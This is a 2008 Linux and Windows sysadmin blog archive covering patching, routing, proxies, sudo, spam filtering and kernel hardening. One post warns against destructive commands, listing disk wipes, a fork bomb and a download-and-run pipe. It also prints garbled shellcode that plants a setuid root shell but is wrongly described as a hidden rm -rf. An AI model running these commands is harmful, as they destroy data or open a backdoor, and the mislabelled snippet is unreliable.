Monday, December 22, 2008

ClamAV

Clam AntiVirus is a free and open source anti-virus toolkit especially designed for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner and advanced tool for automatic database updates. The core of the package is an anti-virus engine available in a form of shared library. Both ClamAV and its updates are made available free of charge.

Tuesday, December 16, 2008

FreeBSD:Automate Security Patches

Keep up-to-date with security patches.

We all know that keeping up-to-date with security patches is important. The trick is coming up with a workable plan that ensures you're aware of new patches as they're released, as well as the steps required to apply those patches correctly.

Michael Vince created quickpatch to assist in this process. It allows you to automate the portions of the patching process you'd like to automate and manually perform the steps you prefer to do yourself.

Preparing the Script
quickpatch requires a few dependencies: perl, cvsup, and wget. Use which to determine if you already have these installed on your system:

% which perl cvsup wget

/usr/bin/perl

/usr/local/bin/cvsup

wget: Command not found.


Install any missing dependencies via the appropriate port (/usr/ports/lang/perl5, /usr/ports/net/cvsup-without-gui, and /usr/ports/ftp/wget, respectively).

Once you have the dependencies, download the script from http://roq.com/projects/quickpatch and untar it:

% tar xzvf quickpatch.tar.gz


This will produce an executable Perl script named quickpatch.pl. Open this script in your favorite editor and review the first two screens of comments, up to the #Stuff you probably don't want to change line.

Make sure that the $release line matches the tag you're using in your cvs-supfile [Hack #80] :

# The release plus security patches branch for FreeBSD that you are

# following in cvsup.

# It should always be a long the lines of RELENG_X_X , example RELENG_7_1

$release='RELENG_7_1';


The next few paths are fine as they are, unless you have a particular reason to change them:

# Ftp server mirror from where to fetch FreeBSD security advisories

$ftpserver="ftp.freebsd.org";

# Path to store patcher program files

$patchdir="/usr/src/";

# Path to store FreeBSD security advisories

$advdir="/var/db/advisories/";

$advdirtmp="$advdir"."tmp/";


If you're planning on applying the patches manually and, when required, rebuilding your kernel yourself, leave the next section as is. If you're brave enough to automate the works, make sure that the following paths accurately reflect your kernel configuration file and build directories:

# Path to your kernel rebuild script for source patches that require kernel

#rebuild

$kernelbuild="/usr/src/buildkernel";

#$kernelbuild="cd /usr/src ; make buildkernel KERNCONF=GENERIC && make

#installkernel KERNCONF=GENERIC ; reboot";

# Path to your system recompile scipt for patches that require full

# operating system recompile

$buildworld="/usr/src/buildworld";

#$buildworld="cd /usr/src/ ; make buildworld && make installworld ; reboot";

#Run patch command after creation, default no

$runpatchfile="0";

# Minimum advisory age in hours. This is to make sure you don't patch

# before your local cvsup server has had a

# chance to recieve the source change update to your branch, in hours

$advisory_age="24";


Review the email accounts so the appropriate account receives notifications:

# Notify email accounts, eg: qw(billg@microsoft.com root@localhost);

@emails = qw(root);


6.15.2 Running the Hack
Run the script without any arguments to see the available options:

# /.quickpatch.pl

# Directory /var/db/advisories/ does not exist, creating

# Directory /var/db/advisories/tmp/ does not exist, creating

Quickpatch - Easy source based security update system

"./quickpatch.pl updateadv" to download / update advisories db

"./quickpatch.pl patch" or "./quickpatch.pl patch > big_patch_file" to

create patch files

"./quickpatch.pl notify" does not do anything but email you commands of what

it would do

"./quickpatch.pl pgpcheck" to PGP check advisories


Before applying any patches, it needs to know which patches exist. Start by downloading the advisories:

# ./quickpatch.pl updateadv


This will connect to ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories and download all of the advisories to /var/db/advisories. The first time you use this command, it will take a while. However, once you have a copy of the advisories, it takes only a second or so to compare your copies with the FTP site and, if necessary, download any new advisories.

After downloading the advisories, see if your system needs patching:

# ./quickpatch.pl notify

#


If the system is fully patched, you'll receive your prompt back. However, if the system is behind in patches, you'll see output similar to this:

# ./quickpatch.pl notify

######################################################################

####### FreeBSD-SA-04%3A02.shmat.asc

####### Stored in file /var/db/advisories/tmp/FreeBSD-SA-04%3A02.shmat

####### Topic: shmat reference counting bug

####### Hostname: genisis - 20/2/2004 11:57:30

####### Date Corrected: 2004-02-04 18:01:10

####### Hours past since corrected: 382

####### Patch Commands

cd /usr/src

# patch < /path/to/patch

### c) Recompile your kernel as described in

and reboot the

system.

/usr/src/buildkernel

## Emailed root


It looks like this system needs to be patched against the "schmat reference counting bug." While running in notify mode, quickpatch emails this information to the configured address but neither creates nor installs the patch.

To create the patch, use:

# ./quickpatch.pl patch

#########################################################

####### FreeBSD-SA-04%3A02.shmat.asc

####### Stored in file /usr/src/FreeBSD-SA-04%3A02.shmat

####### Topic: shmat reference counting bug

####### Hostname: genisis - 21/2/2004 10:41:54

####### Date Corrected: 2004-02-04 18:01:10

####### Hours past since corrected: 405

####### Patch Commands

cd /usr/src

# patch < /path/to/patch

### c) Recompile your kernel as described in

# and reboot the

#system.

/usr/src/buildkernel



# file /usr/src/FreeBSD-SA-04%3A02.shmat

Thursday, December 11, 2008

The 7 most dangerous commands of GNU/Linux

1. rm-rf /
This powerful command deletes all files in our root directory "/" if they want to see the power of this command to see this video

2. Code:

char esp [] __attribute__ ((section (. "text"))) / * esp
release * /
= "\ Xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ X83 \ xec \ x64 \ x68?
"\ Xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99?
"\ Xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7?
"\ X56 \ X04 \ xf7 \ X56 \ x08 \ xf7 \ X56 \ x0c \ X83 \ xc4 \ x74 \ X56?
"\ X8d \ x73 \ x08 \ X56 \ x53 \ x54 \ X59 \ xb0 \ x0b \ xcd \ x80 \ x31?
"\ Xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69?
"\ X6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00?
"Cp-p / bin / sh / tmp / .beyond; chmod 4755
/ tmp / .beyond; "

This is the hex version of [rm-rf /] that can deceive even those not experienced users of GNU/Linux.

3. mkfs.ext3 / dev / sda

This will reformat all the files on the device that is mentioned after the mkfs command.

4. :(){:|:&};:

Known as forkbomb, this command to run a large number of processes until the system freezes. This can lead to data corruption.

5. any_command> / dev / sda

This command causes total loss of data, in the partition that is mentioned in command

6. http://some_untrusted_source wget-O-| sh

Never download untrusted sources and below are implemented, they may be malicious codes

7. mv / home / yourhomedirectory / * / dev / null

This command will move all the files in your home to a place that does not exist, never really your files again

If you got any other dangerous command, please let me know, I will include it over here.

[Ref: http://www.linuxpromagazine.com/online/news/seven_deadliest_linux_commands?category=13447]

Monday, December 8, 2008

Configure Routing , NAT and Gateway in Linux

A router is a device that directs network traffic destined for an entirely different network in the right direction. For example, suppose your network is having the IP address range of 192.168.1.0/16 and you also have a different network which has a network addresses in range 192.168.2.0/16 . Note that these are ‘Class C’ network addresses which are sub netted. So for your computer ( on the network 192.168.1.0/16 ) to directly communicate between a computer in the network 192.168.2.0/16, you need a intermediary to direct the traffic to the destination network. This is achieved by a router.

Configuring Linux as a router
Linux can be effectively configured to act as a router between two networks. To activate routing functionality , you enable IP forwarding in Linux. This is how you do this:

# echo “1″ > /proc/sys/net/ipv4/ip_forward

Now you have enabled IP forwarding in Linux. Now make this change persistent across reboots by editing the file /etc/sysctl.conf and entering the following line:

# vi /etc/sysctl.conf

net.ipv4.ip_forward = 1


Optionally, after editing the above file, you may execute the command :
# sysctl -p

Note: For your linux machine to act as a router, you need two Ethernet cards in your machine or you can also configure a single ethernet card to have multiple IP addresses.

What is a gateway?
Any device which acts as the path to or from your network to another network or the internet is considered to be a gateway. Let me explain this with an example: Suppose your computer, machine_B has an address 192.168.0.5 with default netmask. And another computer (machine_A) with an IP address 192.168.0.1 in your network is connected to the internet using a USB cable modem. Now if you want machine_B to send or recieve data destined for an outside network a.k.a internet, it has to direct it to machine_A first which forwards it to the internet. So machine_A acts as the gateway to the internet. Each machine needs a default gateway to reach machines outside the local network. You can set the gateway in machine_B to point to machine_A as follows:
# route add default gw machine_A

Or if DNS is not configured…

# route add default gw 192.168.0.1

Now you can check if the default gateway is set on machine_B as follows:

# route -n

Note: Additional routes can be set using route command. To make the changes persistent across reboots, you may edit the /etc/sysconfig/static-routes file to show the configured route.

What is NAT ?
Network Address Translation (NAT) is a capability of linux kernel where the source or destination address / port of the packet is altered while in transit.

This is used in situations where multiple machines need to access the internet with only one official IP address available. A common name for this is IP masquerading. With masquerading, your router acts as a OSI layer 3 or layer 4 proxy. In this case, Linux keeps track of the packet(s) journey so that during transmission and recipt of data, the content of the session remains intact. You can easily implement NAT on your gateway machine or router by using Iptables, which I will explain in another post.

Wednesday, December 3, 2008

Linux: Setup a transparent proxy with Squid 2.6 in three easy steps

Server Configuration
Step #1 : Squid configuration so that it will act as a transparent proxy
Step #2 : Iptables configuration
a) Configure system as router
b) Forward all http requests to 3128 (DNAT)
Step #3: Run scripts and start squid service
First, Squid server installed (use up2date squid) and configured by adding following directives to file:
# vi /etc/squid/squid.conf
Modify or add following squid directives:
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on
acl lan src 192.168.1.1 192.168.2.0/24
http_access allow localhost
http_access allow lan
Where,

httpd_accel_host virtual: Squid as an httpd accelerator
httpd_accel_port 80: 80 is port you want to act as a proxy
httpd_accel_with_proxy on: Squid act as both a local httpd accelerator and as a proxy.
httpd_accel_uses_host_header on: Header is turned on which is the hostname from the URL.
acl lan src 192.168.1.1 192.168.2.0/24: Access control list, only allow LAN computers to use squid
http_access allow localhost: Squid access to LAN and localhost ACL only
http_access allow lan: — same as above –

Iptables configuration
Next, I had added following rules to forward all http requests (coming to port 80) to the Squid server port 3128 :
iptables -t nat -A PREROUTING -i eth1 -p tcp –dport 80 -j DNAT –to 192.168.1.1:3128
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 3128

Tuesday, December 2, 2008

Configuring sudo and adding users to Wheel group

If a server needs to be administered by a number of people it is normally not a good idea for them all to use the root account. This is because it becomes difficult to determine exactly who did what, when and where if everyone logs in with the same credentials. The sudo utility was designed to overcome this difficulty.

With sudo (which stands for "superuser do"), you can delegate a limited set of administrative responsibilities to other users, who are strictly limited to the commands you allow them. sudo creates a thorough audit trail, so everything users do gets logged; if users somehow manage to do something they shouldn't have, you'll be able to detect it and apply the needed fixes. You can even configure sudo centrally, so its permissions apply to several hosts.

The privileged command you want to run must first begin with the word sudo followed by the command's regular syntax. When running the command with the sudo prefix, you will be prompted for your regular password before it is executed. You may run other privileged commands using sudo within a five-minute period without being re-prompted for a password. All commands run as sudo are logged in the log file /var/log/messages.


The sudo configuration file is /etc/sudoers. We should never edit this file manually. Instead, use the visudo command: # visudo

This protects from conflicts (when two admins edit this file at the same time) and guarantees that the right syntax is used (the permission bits are correct). The program uses Vi text editor.

All Access to Specific Users
You can grant users bob and bunny full access to all privileged commands, with this sudoers entry.
user1, user2 ALL=(ALL) ALL
This is generally not a good idea because this allows user1 and user2 to use the su command to grant themselves permanent root privileges thereby bypassing the command logging features of sudo.

Access To Specific Users To Specific Files
This entry allows user1 and all the members of the group operator to gain access to all the program files in the /sbin and /usr/sbin directories, plus the privilege of running the command /usr/apps/check.pl.
user1, %operator ALL= /sbin/, /usr/sbin, /usr/apps/check.pl

Access to Specific Files as Another User
user1 ALL=(accounts) /bin/kill, /usr/bin/kill, /usr/bin/pkill

Access Without Needing Passwords
This example allows all users in the group operator to execute all the commands in the /sbin directory without the need for entering a password.
%operator ALL= NOPASSWD: /sbin/

Adding users to the wheel group
The wheel group is a legacy from UNIX. When a server had to be maintained at a higher level than the day-to-day system administrator, root rights were often required. The 'wheel' group was used to create a pool of user accounts that were allowed to get that level of access to the server. If you weren't in the 'wheel' group, you were denied access to root.

Edit the configuration file (/etc/sudoers) with visudo and change these lines:
# Uncomment to allow people in group wheel to run all commands
# %wheel ALL=(ALL) ALL

To this (as recommended):

# Uncomment to allow people in group wheel to run all commands
%wheel ALL=(ALL) ALL

This will allow anyone in the wheel group to execute commands using sudo (rather than having to add each person one by one).

Now finally use the following command to add any user (e.g- user1) to Wheel group
# usermod -G10 testuser

Sunday, November 23, 2008

Read-only domain controller support

Windows Server 2008 introduces a new type of domain controller, the read-only domain controller (RODC). An RODC provides, in effect, a shadow copy of a domain controller that cannot be directly configured, which makes it less vulnerable to attack. You can install an RODC in locations where physical security for the domain controller cannot be guaranteed.
To support RODCs, a DNS server running Windows Server 2008 supports a new type of zone, the primary read-only zone (also sometimes referred to as a branch office zone). When a computer becomes an RODC, it replicates a full read-only copy of all of the application directory partitions that DNS uses, including the domain partition, ForestDNSZones and DomainDNSZones. This ensures that the DNS server running on the RODC has a full read-only copy of any DNS zones stored on a centrally located domain controller in those directory partitions. The administrator of an RODC can view the contents of a primary read-only zone; however, the administrator can change the contents only by changing the zone on the centrally located domain controller.


Why is this functionality important?
AD DS relies on DNS to provide name-resolution services to network clients. The changes to the DNS Server service are required to support AD DS on an RODC.

Sunday, November 16, 2008

Physical Memory Supported for RHEL

RHEL3 Limitions
- x86 - 64 GB
- x86_64 - 64 GB
- ia64 - 128 GB

RHEL4 Limitions
- x86 - 64 GB
- x86_64 - 128 GB
- ia64 - 1 TB

RHEL5 Limitions
- x86 - 64 GB
- x86_64 - 256 GB
- ia64 - 2 TB

Tuesday, November 11, 2008

Curbing Image/PDF spam : SpamAssassin

A lot of spam image/PDFs were slipping through my office MXs since this spamming technique has gained its popularity and it was getting really out of hands. I have decided to put an end to this madness and experimented various tactics to curb image/PDF spam. Generally, this can be achieved with spam scoring from SpamAssassin or clamav via Sanesecurity’s Phishing and Scam Signatures for ClamAV.

On this post, I will share some of the tactics that I have tried with SpamAssassin. With SpamAssassin, fighting image/PDF spam was trivial.

SpamAssassin rules

A) Built-in ruleset

TVD_PDF_FINGER01, which looks for mail matches standard pdf spam fingerprint (emails that have empty bodies
but contain PDF attachments), was added by the SpamAssassin developer. It works well by add 1.0 mark to PDF spam. However, this is too low to effectively catch PDF spam as threshold for tagging spam commonly stands at 5.0 - 10.0. Increasing the
score is a bad idea since a lot of lazy users regularly send PDF attachments with empty mail bodies, and this could lead to false positives.

B) Custom rulesets

This one goes to Ditesh as he wanted to further tighten his server by blocking attachment from stranger. I would suggest to use this ruleset with higher scoring. (Blocking is not a good idea). This custom ruleset was posted by Eric A. Hall on the SpamAssassin-Users
list recently. It uses the AWL to determine whether the sender of a binary
attachment is a stranger (Image/PDF spammers, of course, are strangers to you. ;-)). As MIMEHeader is included
by default in the SpamAssassin 3.2.x series, you can just happily add the ruleset to your local.cf.

ifplugin Mail::SpamAssassin::Plugin::MIMEHeadermimeheader __L_C_TYPE_APP Content-Type =~ /^application/i
mimeheader __L_C_TYPE_IMAGE Content-Type =~ /^image/i
mimeheader __L_C_TYPE_AUDIO Content-Type =~ /^audio/i
mimeheader __L_C_TYPE_VIDEO Content-Type =~ /^video/i
mimeheader __L_C_TYPE_MODEL Content-Type =~ /^model/i
meta L_STRANGER_APP (!AWL && __L_C_TYPE_APP)
score L_STRANGER_APP 1.0
tflags L_STRANGER_APP noautolearn
priority L_STRANGER_APP 1001 # defer till after AWL
describe L_STRANGER_APP Application file sent by a stranger
meta L_STRANGER_IMAGE (!AWL && __L_C_TYPE_IMAGE)
score L_STRANGER_IMAGE 1.0
tflags L_STRANGER_IMAGE noautolearn
priority L_STRANGER_IMAGE 1001 # defer till after AWL
describe L_STRANGER_IMAGE Image file sent by a stranger
meta L_STRANGER_AUDIO (!AWL && __L_C_TYPE_AUDIO)
score L_STRANGER_AUDIO 1.0
tflags L_STRANGER_AUDIO noautolearn
priority L_STRANGER_AUDIO 1001 # defer till after AWL
describe L_STRANGER_AUDIO Audio file sent by a stranger
meta L_STRANGER_VIDEO (!AWL && __L_C_TYPE_VIDEO)
score L_STRANGER_VIDEO 1.0
tflags L_STRANGER_VIDEO noautolearn
priority L_STRANGER_VIDEO 1001 # defer till after AWL
describe L_STRANGER_VIDEO Video file sent by a stranger
meta L_STRANGER_MODEL (!AWL && __L_C_TYPE_MODEL)
score L_STRANGER_MODEL 1.0
tflags L_STRANGER_MODEL noautolearn
priority L_STRANGER_MODEL 1001 # defer till after AWL
describe L_STRANGER_MODEL Model file sent by a stranger
endif

PDFInfo

Grab PDFInfo.pm and pdfinfo.cf from PDFInfo plugin site. Place pdfinfo.cf in the SpamAssassin’s configuration directory (/usr/local/etc/mail/spamassassin/) and PDFInfo.pm in the SpamAssassin plugin directory (/usr/local/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/Plugin/). To load the plugin, you should add loadplugin Mail::SpamAssassin::Plugin::PDFInfo to init.pre (or v310.pre). Alternatively, you could use loadplugin Mail::SpamAssassin::Plugin::PDFInfo /path/to/your/plugin for placing PDFinfo.pm file in directory other than your SpamAssassin plugin directory. With that in place, you restart your Spamassassin and verify that PDFInfo plugin was loaded properly with debug output from Spamassassin

spamassassin --lint -D

You should get similar lines as below:-

[32487] dbg: config: read file /usr/local/etc/mail/spamassassin/pdfinfo.cf
[32487] dbg: plugin: loading Mail::SpamAssassin::Plugin::PDFInfo from @INC

FuzzyOcr

I’ve installed FuzzyOcr plugin from the FreeBSD ports. /usr/ports/mail/p5-FuzzyOcr-devel/ FuzzyOcr development is recommended as stable release was way too old. It’s easy to maintain. However, manual installation is relatively easy as the tarball contains FuzzyOcr pearl module plugin, configure files and some sample test Image/PDF test mails. Just copy FuzzyOcr.cf and FuzzyOcr.words to the SpamAssassin’s configuration directory (If you installed from ports, the configuration file is located at /usr/local/share/examples/FuzzyOcr/. I created a directory in /var/db called “fuzzyocr” for all FuzzyOcr database and words list. My configuration file looks like this:-

focr_enable_image_hashing 2
focr_global_wordlist /var/db/fuzzyocr/FuzzyOcr.words
focr_scansets $gocr -i $pfile, $gocr -l 180 -d 2 -i $pfile, $ocrad -s 0.5 -T 0.5 $pfile
focr_digest_db /var/db/fuzzyocr/FuzzyOcr.hashdb
focr_db_hash /var/db/fuzzyocr/FuzzyOcr.db
focr_db_safe /var/db/fuzzyocr/FuzzyOcr.safe.db
focr_hashing_learn_scanned 1

Again verify if the plugin is loaded properly in spamassassin.
Other tactics

There are other tactics of fighting Image/PDF spam which I have not tried. As I’m aware of at this point of writting; PDFText and botnet plugin with patch.
CONCLUSIONS

There has been a lot of discussion/experience sharing on SpamAssassin-users and Maia-users list. One notable comment/experience (with the title : [Maia-users] PDF spam solutions) was posted by Robert LeBlanc on Maia-users list. It is comprehensive enough to give you an edge of fighting image/PDF spam. Nevertheless, new spam tactics are evolved day by day. Who knows we might be seeing M$ word / powerpoint spam soon.

Sunday, November 9, 2008

A first look at Internet Information Services 7.0

While Microsoft Internet Information Services 6.0 (IIS) was already a very good Web server, the product now has a number of improvements with IIS 7.0. Some of these enhancements are related to security and server management, while others are geared toward Web developers. Let's take a look at some the new features that matter most to network administrators.

Improved management tools

It may seem trivial, but my favorite improvement has got to be the new management tools. If you look at Figure A, you can see that the user interface has been completely redesigned from scratch. One of Microsoft's reasons for doing this was to create a management interface that allows you to manage Internet Information Services and ASP.NET through a single console.

As with most things in Windows Server 2008, IIS 7.0 has been tied into Windows PowerShell, which means you can perform various management tasks from the command line or through a PowerShell script. Microsoft has also created a new command line tool named APPCMD.EXE that helps automate common management tasks. In doing so, Microsoft has done away with the IIS 6.0-style administration scripts.

Improved troubleshooting

If you have ever tried to troubleshoot a problem with Internet Information Services 6.0, then you know that the troubleshooting process can be difficult, to say the least. Fortunately, Microsoft has finally taken some steps to make the troubleshooting process easier. The log file entries that IIS 7.0 produces are much more detailed than those created by IIS 6.0, and they include more status codes. These improvements should help administrators troubleshoot problems much faster.

Compartmentalized installation

One of the things about Internet Information Services that always bugged me was that it always seemed a bit bloated. Sure, Windows Server 2003 allows you to pick which IIS components you want to install, but many of these components are made of sub-components that cannot be disabled. Granted, IIS isn't that large of an application, but there is something to be said for reducing the potential attack surface of a Web server.

With Internet Information Services 7.0, Microsoft broke down IIS into dozens of modular components, each of which can be individually enabled or disabled. In Figure B, you can see just how granular the installation process has become.

SSL-encrypted FTP

Although IIS has supported Secure Sockets Layer (SSL) encryption for websites for many years now, for some reason, Microsoft never offered the ability to encrypt FTP traffic. In Internet Information Services 7.0, the company has completely rewritten its FTP server module to bring it up to date. Not only does it now support SSL encryption, but it also makes it easy to create FTP publishing points for Web applications, using either an independent authentication method or authentication via Microsoft Active Directory.

One thing I want to mention about the new FTP publishing service is that it is not actually included with Internet Information Services 7.0 -- although it is considered to be an officially supported IIS 7.0 feature. You can download the FTP publishing service here.

Delegated administration

Another cool new feature is something called delegated administration. The basic idea behind this feature is to make a single IIS server capable of hosting multiple websites. In the past, if admins could administer one website, they could manage every site hosted by the server. Internet Information Services 7.0 allows you to perform delegations so that administrators are limited to managing only specific websites or even individual parts of a website.

Remote administration

Traditionally, if an administrator wanted to manage Internet Information Services, then the tool of choice was usually the IIS Manager console. However, IIS 7.0 contains a new remote management tool called Web Management Services (WMSVC) that you can use to manage the server over the Web by using HTTPS. It is important to keep in mind that Web Management Services is not installed by default. You can find detailed instructions for installing this new component here.

All of these improvements go a long way toward making Internet Information Services 7.0 a lot more secure and easier to manage than IIS 6.0

Wednesday, November 5, 2008

Quick Guide to compress / decompress files

tar (tar)
tar Packaging
tar cvf archive.tar / archive / May / *
Unpack
tar xvf archive.tar
See the content (not extract)
tar tvf archive.tar
tar.gz -. tar.Z -. tgz (tar with gzip)
Pack and compress
tar czvf archive.tar.gz tar / archive / May / *
Unpack and decompress
tar xzvf archive.tar.gz
See the content (not extract)
tar tzvf archive.tar.gz
gz (gzip)
Compress
gzip file-q
(The file compresses it and rename it as "archive.gz")
Unzip
gzip-d archive.gz
(The file unzip it and leave it as a "file")
Note: gzip only compresses files, not directories
bz2 (bzip2)
Compress
bzip2 file
bunzip2 file
(The file compresses it and rename it as "archive.bz2")
Unzip
bzip2-d archive.bz2
bunzip2 archive.bz2
(The file unzip it and leave it as a "file")
Note: only bzip2 compressed files, not directories
tar.bz2 (tar with bzip2)
Compress
tar-c files | bzip2> archive.tar.bz2
Unzip
bzip2-dc archive.tar.bz2 | tar-xv
tar jvxf archive.tar.bz2 (recent versions of tar)
View content
bzip2-dc archive.tar.bz2 | tar-tv
zip (zip)
Compress
zip archive.zip / May / files
Unzip
unzip archive.zip
View content
unzip-v archive.zip
rar (rar)
Compress
rar-a archive.rar / May / files
Unzip
rar-x archive.rar
View content
rar-v archive.rar
rar-l archive.rar

Sunday, November 2, 2008

Ubuntu…8.04 LTS Server

Take a look at the LTS version of the server. When it released it did not have LVM2, it did not have all of the updated software raid tools, it did not have acls installed either. Each of these is a standard option that any administrator would want available, especially in the LTS version. They could be installed manually once you installed 8.04 but they were later installed via the update process. The point is, Ubuntu should have released a solid up to date server version in 8.04, not build it as you go with updates. Administrators depend on their servers being up to speed when they install. In addition, adding LVM2, raid tools and acls at a later date after the installation are problematic.

Wednesday, October 29, 2008

How do I force users to change their passwords upon first login?

1.) Firstly, lock the account to prevent the user from using the login until the change has been made:

# usermod -L 

2.) Change the password expiration date to 0 to ensure the user changes the password during the next login:

# chage -d 0 

3.) To unlock the account after the change do the following:

# usermod -U 


Wednesday, October 22, 2008

Kernel parameters for enhance security

The following list shows tunable kernel parameters you can use to secure your Linux server against attacks.

For each tunable kernel parameters you need to be add it to the /etc/sysctl.conf configuration file to make the change permanent after reboots. To activate the configured kernel parameters immediately at runtime, use:
# sysctl -p

Enable TCP SYN Cookie Protection

A "SYN Attack" is a denial of service attack that consumes all the resources on a machine. Any server that is connected to a network is potentially subject to this attack.

To enable TCP SYN Cookie Protection, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.tcp_syncookies = 1

Disable IP Source Routing

Source Routing is used to specify a path or route through the network from source to destination. This feature can be used by network people for diagnosing problems. However, if an intruder was able to send a source routed packet into the network, then he could intercept the replies and your server might not know that it's not communicating with a trusted server.

To enable Source Route Verification, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.conf.all.accept_source_route = 0

Disable ICMP Redirect Acceptance

ICMP redirects are used by routers to tell the server that there is a better path to other networks than the one chosen by the server. However, an intruder could potentially use ICMP redirect packets to alter the hosts's routing table by causing traffic to use a path you didn't intend.

To disable ICMP Redirect Acceptance, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.conf.all.accept_redirects = 0

Enable IP Spoofing Protection

IP spoofing is a technique where an intruder sends out packets which claim to be from another host by manipulating the source address. IP spoofing is very often used for denial of service attacks. For more information on IP Spoofing, I recommend the article IP Spoofing: Understanding the basics.

To enable IP Spoofing Protection, turn on Source Address Verification. Edit the /etc/sysctl.conf file and add the following line:
net.ipv4.conf.all.rp_filter = 1

Enable Ignoring to ICMP Requests

If you want or need Linux to ignore ping requests, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.icmp_echo_ignore_all = 1
This cannot be done in many environments.

Enable Ignoring Broadcasts Request

If you want or need Linux to ignore broadcast requests, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.icmp_echo_ignore_broadcasts = 1

Enable Bad Error Message Protection

To alert you about bad error messages in the network, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.icmp_ignore_bogus_error_responses = 1

Enable Logging of Spoofed Packets, Source Routed Packets, Redirect Packets

To turn on logging for Spoofed Packets, Source Routed Packets, and Redirect Packets, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.conf.all.log_martians = 1

Thursday, October 16, 2008

/proc explained

This filesystem (/proc) contains a huge set of numbered directories that come and go. Each and one of these numbered directories contains information pertaining to all of the currently active processes on the machine. When a new process is started, a new directory is created in the /proc filesystem for it, and a lot of data is created within it regarding the process, such as the commandline with which the program was started with, a link to the "current working directory", environment variables, where the executable is located, and so on

Most of the information in the files are rather "human readable", except a few of them. However, a few of them you should not touch, such as the kcore file. The kcore file contains debugging information regarding the kernel, and if you try to 'cat' it, your system may very well hang up and die. If you try to copy it to a real file on the harddrive, you will very soon have filled up your whole partition, and so on. What all of this tells you is to be very careful. Mostly, none of the variables or entries in the /proc filesystem is not dangerous to watch, but a few of them are. A brief walkthrough of the most important files:
  • cmdline - The command line issued when starting the kernel.
  • cpuinfo - Information about the Central Processing Unit, who made it, known bugs, flags etcetera.
  • dma - Contains information about all DMA channels available, and which driver is using it.
  • filesystems - Contains short information about every single filesystem that the kernel supports.
  • interrupts - Gives you a brief listing of all IRQ channels, how many interrupts they have seen and what driver is actually using it.
  • iomem - A brief file containing all IO memory mappings used by different drivers.
  • ioports - Contains a brief listing of all IO ports used by different drivers.
  • kcore - Contains a complete memory dump. Do not cat or anything like that, you may freeze your system. Mainly used to debug the system.
  • kmsg - Contains messages sent by kernel, is not and should not be readable by users since it may contain vital information. Main usage is to debug the system.
  • ksyms - This contains the kernel symbol table, which is mainly used to debug the kernel.
  • loadavg - Gives the load average of the system during the last 1, 5 and 15 minutes.
  • meminfo - Contains information about memory usage on the system.
  • modules - Contains information about all currently loaded modules in the kernel.
  • mounts - Symlink to another file in the /proc filesystem which contains information about all mounted filesystems.
  • partitions - Contains information about all partitions found on all drives in the system.
  • pci - Gives tons of hardware information about all PCI devices on the system, also includes AGP devices and built in devices which are connected to the PCI bus.
  • swaps - Contains information about all swap partitions mounted.
  • uptime - Gives you the uptime of the computer since it was last rebooted in seconds.
  • version - Gives the exact version string of the kernel currently running, including build date and gcc versions etcetera.
And here is a list of the main directories and what you can expect to find in there:
  • bus - Contains information about all the buses, hardware-wise, such as USB, PCI and ISA buses.
  • ide - Contains information about all of the IDE buses on systems that has IDE buses.
  • net - Some basic information and statistics about the different network systems compiled into the system.
  • scsi - This directory contains information about SCSI buses on SCSI systems.
  • sys - Contains lots of variables that may be changed, including the /proc/sys/net/ipv4 which will be deeply discussed in this document.

Wednesday, October 8, 2008

EXCHANGE SERVER ADMINISTRATION TIPS Plan an Exchange 2007 standby continuous replication (SCR) deployment

Microsoft added standby continuous replication (SCR) to its solutions in Exchange Server 2007 Service Pack 1 (SP1). SCR works similarly to local continuous replication (LCR) and cluster continuous replication (CCR) but has some limitations, such as a lack of support for automatic failover. Get an understanding of how standby continuous replication works within your Exchange environment and how to properly plan an SCR deployment.

Microsoft Exchange Server 2007 brought with it several new features, including local continuous replication and cluster continuous replication. These features use log shipping to store a secondary copy of the Exchange server database in an alternate location. That way, the server can be recovered quickly by retrieving data from the database replica in the event of a catastrophic failure.

Although LCR and CCR are great features, Microsoft went a step further in Exchange Server 2007 SP1 with standby continuous replication, which works similarly to LCR and CCR, but has some additional capabilities. SCR overcomes some of the limits of LCR and CCR. It may be tempting to begin using SCR immediately, but you should be aware of its significant limitations and restrictions. That's why it's crucial to properly plan an SCR deployment.

LCR requires that database replicas are stored locally; CCR lets you store database replicas on a different server that must exist in the same subnet as the primary database server. With this, you can have only one replica.

SCR allows your primary mailbox server (source) to replicate its database to multiple standby servers (targets). These target servers can exist on your LAN, but that isn't necessary. The subnet limitation doesn't apply to SCR.

The first SCR limitation to be aware of is that, like LCR and CCR, SCR works by replicating an individual storage group. However, you can't replicate any storage group. Recovery storage groups are not supported, and the storage group that you're replicating can't contain more than one database.

While there is no limitation to the number of targets that a source storage group can be replicated to, Microsoft recommends that you limit the process to no more than four targets.

SCR and server roles

Although Microsoft recommends using a dedicated Exchange Server to host each server role, many companies choose to host multiple roles on a server because they lack the budget for a fully distributed deployment or they don't have enough users to justify having dedicated servers for each role. Because hosting multiple roles on a single Exchange Server is a common practice, it's important to understand how server roles work when SCR is implemented.

The roles that an SCR source server can host vary, depending on whether or not the server is clustered. If the source server is clustered, then it can only host the Mailbox Server role. If the source server isn't clustered, then the Mailbox Server role is required for SCR. However, the server can also optionally host the Client Access Server, Hub Transport Server or Unified Messaging (UM) Server roles.

The same basic rules apply to SCR target servers. The Mailbox Server role is always required, because it contains the necessary replication components. If the target isn't part of a cluster, it can optionally host the Client Access Server, Hub Transport Server, or Unified Messaging Server roles. In either case, LCR cannot be used on a target server.

